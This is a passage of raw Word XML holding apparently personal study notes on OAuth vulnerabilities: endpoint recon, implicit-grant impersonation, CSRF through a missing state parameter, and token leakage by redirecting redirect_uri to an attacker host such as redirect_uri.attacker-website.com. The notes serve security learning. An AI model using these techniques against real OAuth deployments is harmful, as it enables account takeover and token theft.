    <w:p w14:paraId="5B766079" w14:textId="77777777" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047"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4. API call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEDD3D1" w14:textId="7650F920" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Resource grant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B723118" w14:textId="77777777" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000B2044" w14:textId="77777777" w:rsidR="00E81047" w:rsidRPr="008026BD" w:rsidRDefault="00E81047" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE8616" w14:textId="37279DC0" w:rsidR="00C24CCB" w:rsidRPr="008026BD" w:rsidRDefault="0076788B" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
      <w:r w:rsidR="00C24CCB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C24CCB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00C24CCB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> request to the following endpoints of the </w:t>
      </w:r>
      <w:r w:rsidR="00C24CCB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>authorization server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCAA96B" w14:textId="77777777" w:rsidR="00C24CCB" w:rsidRPr="008026BD" w:rsidRDefault="00C24CCB" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>/.well</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>-known/oauth-authorization-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D26D3F" w14:textId="275E5523" w:rsidR="00C24CCB" w:rsidRPr="008026BD" w:rsidRDefault="00C24CCB" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>/.well</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>-known/openid-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E9A936" w14:textId="3A82A57E" w:rsidR="00FA26F0" w:rsidRPr="008026BD" w:rsidRDefault="00950DD4" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/.well-known/jwks.json</w:t>
      </w:r>
      <w:r w:rsidR="00DC1978" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC1978" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(keys for signing the JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342FC09" w14:textId="77777777" w:rsidR="0076788B" w:rsidRPr="008026BD" w:rsidRDefault="0076788B" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vulnerabilities in the OAuth client application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDB6AD7" w14:textId="77777777" w:rsidR="0076788B" w:rsidRPr="008026BD" w:rsidRDefault="0076788B"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Improper implementation of the implicit grant type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF58DDF" w14:textId="7A0A6FD9" w:rsidR="006374C4" w:rsidRPr="008026BD" w:rsidRDefault="006374C4" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If the client application wants to maintain the session after the user closes the page, it needs to store the current user data (userID, access token). </w:t>
      </w:r>
      <w:r w:rsidR="0076788B" w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The client application submits the data to the server in a </w:t>
      </w:r>
      <w:r w:rsidR="0076788B" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="0076788B" w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> request and then assign the user a session cookie. However, in this scenario, the server does not have any secrets or passwords to compare with the submitted data, which means that it is implicitly trusted. We can change this data to impersonate any user</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; use the token for any </w:t>
      </w:r>
      <w:r w:rsidR="004465BD" w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(email) </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71D63C" w14:textId="77777777" w:rsidR="004465BD" w:rsidRPr="008026BD" w:rsidRDefault="004465BD" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290C23AB" w14:textId="77777777" w:rsidR="004465BD" w:rsidRPr="008026BD" w:rsidRDefault="004465BD" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flawed CSRF protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03639E18" w14:textId="5456F309" w:rsidR="0076788B" w:rsidRPr="008026BD" w:rsidRDefault="00B9084F" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If no </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter is used, we can initiate an OAuth flow and trick a victim into completing it (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF attack). This can be used to effectively maked the victim bind their account to our social media acocunt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C75B1B" w14:textId="65B66017" w:rsidR="006374C4" w:rsidRPr="008026BD" w:rsidRDefault="00B9084F" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="006374C4" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">e need to </w:t>
      </w:r>
      <w:r w:rsidR="006374C4" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stop the token being sent to the client application</w:t>
      </w:r>
      <w:r w:rsidR="006374C4" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that the token </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remains valid for the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF7628" w14:textId="77777777" w:rsidR="0076788B" w:rsidRPr="008026BD" w:rsidRDefault="0076788B" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109C8D73" w14:textId="77777777" w:rsidR="00606A92" w:rsidRPr="008026BD" w:rsidRDefault="00606A92" w:rsidP="00606A92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Leaking authorization codes and access tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D92A53" w14:textId="7FF8D72D" w:rsidR="0076788B" w:rsidRPr="008026BD" w:rsidRDefault="00606A92" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We can make the victim initate an OAuth flow that </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidR="00CF3B49" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the code/token to us</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00CF3B49" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set the </w:t>
      </w:r>
      <w:r w:rsidR="00CF3B49" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:r w:rsidR="00CF3B49" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointing our exploit server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F3C91" w14:textId="77E9F8B2" w:rsidR="0076788B" w:rsidRPr="008026BD" w:rsidRDefault="00CF3B49" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then use this code/token to authenticate ourselves as the victim to the </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/callback</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2898FA16" w14:textId="77777777" w:rsidR="0076788B" w:rsidRPr="008026BD" w:rsidRDefault="0076788B" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C959B00" w14:textId="77777777" w:rsidR="005D1CAA" w:rsidRPr="008026BD" w:rsidRDefault="005D1CAA" w:rsidP="005D1CAA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flawed redirect_uri validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB8FA52" w14:textId="05BB28A9" w:rsidR="00204B8C" w:rsidRPr="008026BD" w:rsidRDefault="004D3836" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Try</w:t>
      </w:r>
      <w:r w:rsidR="00204B8C" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> circumvent</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00204B8C" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect_uri validation</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF09FED" w14:textId="2D07035C" w:rsidR="007D676B" w:rsidRPr="008026BD" w:rsidRDefault="007D676B" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ place the </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as subdomain</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="004D3836" w:rsidRPr="008026BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier" w:cs="Courier New"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://redirect_uri.attacker-website.com/csrf-attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27B3621C" w14:textId="76F2AE23" w:rsidR="00204B8C" w:rsidRPr="008026BD" w:rsidRDefault="007D676B" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
